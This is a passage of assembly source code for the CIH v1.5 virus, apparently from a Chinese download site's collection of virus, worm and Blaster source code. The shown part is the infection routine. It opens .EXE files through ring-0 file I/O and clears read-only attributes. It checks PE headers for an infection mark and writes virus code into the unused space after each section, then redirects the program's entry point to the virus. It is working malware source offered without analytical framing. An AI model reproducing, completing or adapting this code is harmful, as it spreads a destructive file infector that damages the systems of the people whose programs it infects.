
📄 cih v1.5源程序.txt

📁 病毒源码 包括世上第一个病毒源码、蠕虫源码、冲击波源码
📖 第 1 页 / 共 3 页
; * to a Normal Pathname in the       *
; * Specified BCS Character Set.      *
; *************************************

CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h

; *************************************
; * Is FileName '.EXE' !?             *
; *************************************

cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy

IF DEBUG

; *************************************
; * Only for Debug                    *
; *************************************

cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy

ENDIF

; *************************************
; * Is Open Existing File !?          *
; *************************************

; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy

; *************************************
; * Get Attributes of the File        *
; *************************************

mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx

; *************************************
; * Get IFSMgr_Ring0_FileIO Address   *
; *************************************

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]

; *************************************
; * Is Read-Only File !?              *
; *************************************

test cl, 01h
jz OpenFile

; *************************************
; * Modify Read-Only File to Write    *
; *************************************

mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Open File                         *
; *************************************

OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle

; *************************************
; * Need to Restore                   *
; * Attributes of the File !?         *
; *************************************

pop ecx
pushf
test cl, 01h
jz IsOpenFileOK

; *************************************
; * Restore Attributes of the File    *
; *************************************

mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Is Open File OK !?                *
; *************************************

IsOpenFileOK:
popf
jc DisableOnBusy

; *************************************
; * Open File Already Succeed.   ^__^ *
; *************************************

push esi ; Push FileNameBuffer Address to Stack

pushf ; Now CF = 0, Push Flag to Stack

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetToNewHeader   *
; ***************************

xor eax, eax
mov ah, 0d6h
; To keep the virus code as short as possible,
; I save EAX in EBP so it can be reused.
mov ebp, eax
push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]

; ***************************
; * Get 'PE\0' Signature    *
; * of ImageFileHeader, and *
; * Infected Mark.          *
; ***************************

dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

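; ***************************
; * Is PE !?                *
; ***************************
; * Is the File             *
; * Already Infected !?     *
; ***************************
; * WinZip Self-Extractor   *
; * doesn't Have Infected   *
; * Mark Because My Virus   *
; * doesn't Infect it.      *
; ***************************
; One compare answers both questions: the 4 bytes just read start
; one byte before the 'PE\0\0' signature, so the test below passes
; only when that preceding byte (the infected mark) is 00h and is
; followed by 'PE\0'.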

cmp dword ptr [esi], 00455000h
jne CloseFile

; *************************************
; * The File is                   ^o^ *
; * PE(Portable Executable) indeed.   *
; *************************************
; * The File isn't also Infected.     *
; *************************************

; *************************************
; * Start to Infect the File          *
; *************************************
; * Registers Use Status Now :        *
; *                                   *
; * EAX = 04h                         *
; * EBX = File Handle                 *
; * ECX = 04h                         *
; * EDX = 'PE\0\0' Signature of       *
; *       ImageFileHeader Pointer's   *
; *   Former Byte.                *
; * ESI = DataBuffer Address ==> @8   *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump :                      *
; *                                   *
; * ESP => -------------------------  *
; *        |       EFLAG(CF=0)     |  *
; *        -------------------------  *
; *        | FileNameBufferPointer |  *
; *        -------------------------  *
; *        |          EDI          |  *
; *        -------------------------  *
; *        |          ESI          |  *
; *        -------------------------  *
; *        |          EBP          |  *
; *        -------------------------  *
; *        |          ESP          |  *
; *        -------------------------  *
; *        |          EBX          |  *
; *        -------------------------  *
; *        |          EDX          |  *
; *        -------------------------  *
; *        |          ECX          |  *
; *        -------------------------  *
; *        |          EAX          |  *
; *        -------------------------  *
; *        |     Return Address    |  *
; *        -------------------------  *
; *************************************

push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark

; ***************************
; * Let's Set the           *
; * Virus' Infected Mark    *
; ***************************

push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer

; ***************************
; * Save ESP Register       *
; ***************************

mov dr1, esp

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * ( Only First Set Size ) *
; ***************************

push eax ; Size

; ***************************
; * Let's Read              *
; * Image Header in File    *
; ***************************

mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi  ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * ( Set Pointer of File,  *
; *   Address of Buffer   ) *
; ***************************

lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer

; ***************************
; * Move EDX to the Start   *
; * of SectionTable in File *
; ***************************

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]

; ***************************
; * Let's Get               *
; * Total Size of Sections  *
; ***************************

mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl

; ***************************
; * Let's Set Section Table *
; ***************************

; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer

; ***************************
; * The Code Size of the    *
; * Merge Virus Code        *
; * Section plus the Total  *
; * Size of the Virus Code  *
; * Section Table Must be   *
; * Less than or Equal to   *
; * the Unused Space        *
; * Following the Section   *
; * Table                   *
; ***************************

inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable

add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
jl OnlySetInfectedMark

; ***************************
; * Read All Section Tables *
; ***************************

mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Full Modify the Bug :   *
; * WinZip Self-Extractor   *
; * Occurs Error...         *
; ***************************
; * So When User Opens      *
; * WinZip Self-Extractor,  *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the   *
; * PointerToRawData in the *
; * Second Section Table,   *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'......       *
; ***************************

xchg eax, ebp
push 00000004h
pop ecx
push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
add edx, 12h
call edi ; VXDCall IFSMgr_Ring0_FileIO
                        cmp     dword ptr [esi], 'piZniW'
je NotSetInfectedMark
pop edx

; ***************************
; * Let's Set Total Virus   *
; * Code Section Table      *
; ***************************

; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp
push edx ; Pointer of File
add ebp, esi
push ebp ; Address of Buffer

; ***************************
; * Set the First Virus     *
; * Code Section Size in    *
; * VirusCodeSectionTable   *
; ***************************

lea eax, [ebp+edi-04h]
mov [eax], ebx

; ***************************
; * Let's Set My Virus      *
; * First Section Code      *
; ***************************

push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer

; ***************************
; * Let's Modify the        *
; * AddressOfEntryPoint to  *
; * My Virus Entry Point    *
; ***************************

mov (NewAddressOfEntryPoint-@9)[esi], edx

; ***************************
; * Setup Initial Data      *
; ***************************

lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections

; ***************************
; * Write Code to Sections  *
; ***************************

LoopOfWriteCodeToSections:

add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx

; Section contains initialized data ==> 00000040h
; Section can be Read.              ==> 40000000h
or (Characteristics-@9)[edx], 40000040h

StartToWriteCodeToSections:

sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer

EndOfWriteCodeToSections:

loop LoopOfWriteCodeToSections

; ***************************
; * Only Set Infected Mark  *
; ***************************

OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile

; ***************************
; * Not Set Infected Mark   *
; ***************************

NotSetInfectedMark:
add esp, 3ch
jmp CloseFile

; ***************************
